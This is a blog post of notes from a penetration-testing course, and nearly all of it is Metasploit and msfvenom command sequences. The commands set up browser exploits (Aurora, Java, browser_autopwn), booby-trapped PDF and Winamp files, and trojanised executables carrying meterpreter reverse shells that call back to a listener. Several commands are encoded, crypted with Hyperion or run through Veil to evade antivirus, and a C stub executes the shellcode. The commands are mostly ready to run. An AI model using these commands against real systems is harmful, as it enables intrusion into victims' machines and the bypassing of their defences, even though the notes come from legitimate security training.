Course: Georgia Weidman on "Advanced Penetration Testing" at Cybrary (1) Client Side Exploits Browser Attacks msf > use exploit/windows/browser/ms10_002_aurora msf exploit(ms10_002_aurora) > set SRVHOST 192.168.20.9 SRVHOST => 192.168.20.9 msf exploit(ms10_002_aurora) > set SRVPORT 80 SRVPORT => 80 msf exploit(ms10_002_aurora) > set URIPATH aurora URIPATH => aurora msf exploit(ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(ms10_002_aurora) > set LHOST 192.168.20.9 LHOST => 192.168.20.9 msf exploit(ms10_002_aurora) > exploit [*] Exploit running as background job. [*] Started reverse handler on 192.168.20.9:4444 [*] Using URL: http://192.168.20.9:80/aurora (2) Automatically Migrating msf exploit(ms10_002_aurora) > set PrependMigrate true (3) PDF Exploits msf > use exploit/windows/fileformat/adobe_utilprintf msf exploit(adobe_utilprintf) > show options msf exploit(adobe_utilprintf) > exploit [*] Creating 'msf.pdf' file... [+] msf.pdf stored at /root/.msf4/local/msf.pdf msf exploit(adobe_utilprintf) > cp /root/.msf4/local/msf.pdf /var/www [*] exec: cp /root/.msf4/local/msf.pdf /var/www msf exploit(adobe_utilprintf) > service apache2 start [*] exec service apache2 start Starting web server: apache2. msf exploit(adobe_utilprintf) > use multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp msf exploit(handler) > exploit [*] Started reverse handler on 192.168.20.9:4444 (4) PDF Embedded Executable msf > use exploit/windows/fileformat/adobe_pdf_embedde d_exe msf exploit(adobe_pdf_embedded_exe) > set INFILENAME /usr/share/set/readme/User_Manual.pdf msf exploit(adobe_pdf_embedded_exe) > set payload windows/meterpreter/reverse_tcp msf exploit(adobe_pdf_embedded_exe) > set LHOST 192.168.20.9 msf exploit(adobe_pdf_embedded_exe) > exploit (5) Java Exploits msf > use exploit/multi/browser/java_jre17_jmxbean msf exploit(java_jre17_jmxbean) > set SRVHOST 192.168.20.9 msf exploit(java_jre17_jmxbean) > set SRVPORT 80 msf exploit(java_jre17_jmxbean) > set URIPATH javaexploit msf exploit(java_jre17_jmxbean) > show payloads msf exploit(java_jre17_jmxbean) > set payload java/meterpreter/reverse_http (6) Java Applets msf exploit(java_jre17_jmxbean) > use exploit/multi/browser/java_signed_applet msf exploit(java_signed_applet) > set APPLETNAME [APPNAME] msf exploit(java_signed_applet) > set SRVHOST 192.168.20.9 msf exploit(java_signed_applet) > set SRVPORT 80 (7) Browser Autopwn msf > use auxiliary/server/browser_autopwn msf auxiliary(browser_autopwn) > set LHOST 192.168.20.9 LHOST => 192.168.20.9 msf auxiliary(browser_autopwn) > set URIPATH autopwn URIPATH => autopwn msf auxiliary(browser_autopwn) > exploit [*] Auxiliary module execution completed [*] --- Done, found 16 exploit modules [*] Using URL: http://0.0.0.0:8080/autopwn [*] Local IP: http://192.168.20.9:8080/autopwn [*] Server started. (8) Winamp Skin Example msf > use exploit/windows/fileformat/winamp_maki_bof msf exploit(winamp_maki_bof) > set payload windows/meterpreter/reverse_tcp msf exploit(winamp_maki_bof) > set LHOST 192.168.20.9 msf exploit(winamp_maki_bof) > exploit Social Engineering setoolkit Trojans msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 LPORT=2345 -x /usr/share/windowsbinaries/radmin.exe -k -f exe > radmin.exe -x executable template -k run the shellcode in a new thread Metasploit Encoding We can also run our shellcode through an encoder to obfuscate it. msfvenom -l encoders msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 LPORT=2345 -e x86/shikata_ga_nai -i 10 -f exe > meterpreterencoded.exe Multi-Encoding msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 LPORT=2345 -e x86/shikata_ga_nai -i 10 -f raw> meterpreterencoded.bin msfvenom -p -f exe -a x86 --platform windows -e x86/bloxor -i 2 > meterpretermultiencoded.exe < meterpreterencoded.bin Combining Techniques msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 LPORT=2345 -x /usr/share/windows-binaries/radmin.exe -k -e x86/shikata_ga_nai -i 10 -f exe > radminencoded.exe Custom Compiling #include unsigned char random[]= unsigned char shellcode[]= int main(void) { ((void (*)())shellcode)(); } Creating Shellcode: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 LPORT=2345 -f c -e x86/shikata_ga_nai -i 5 Creating Randomness: cat /dev/urandom | tr -dc A-Z-a-z-0-9 | head -c512 Compiling: i586-mingw32msvc-gcc -o custommeterpreter.exe custommeterpreter.c Hyperion Encrypts with AES encryption and throws away the key. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 LPORT=2345 -f exe > meterpreter.exe cd Hyperion-1.0/ wine ../hyperion ../meterpreter.exe bypassavhyperion.exe Veil Framework for using different techniques to bypass antivirus cd Veil-Evasion-master ./Veil-Evasion.py
0 Comments
Leave a Reply. |
AuthorVitali Kremez Archives
July 2016
Categories |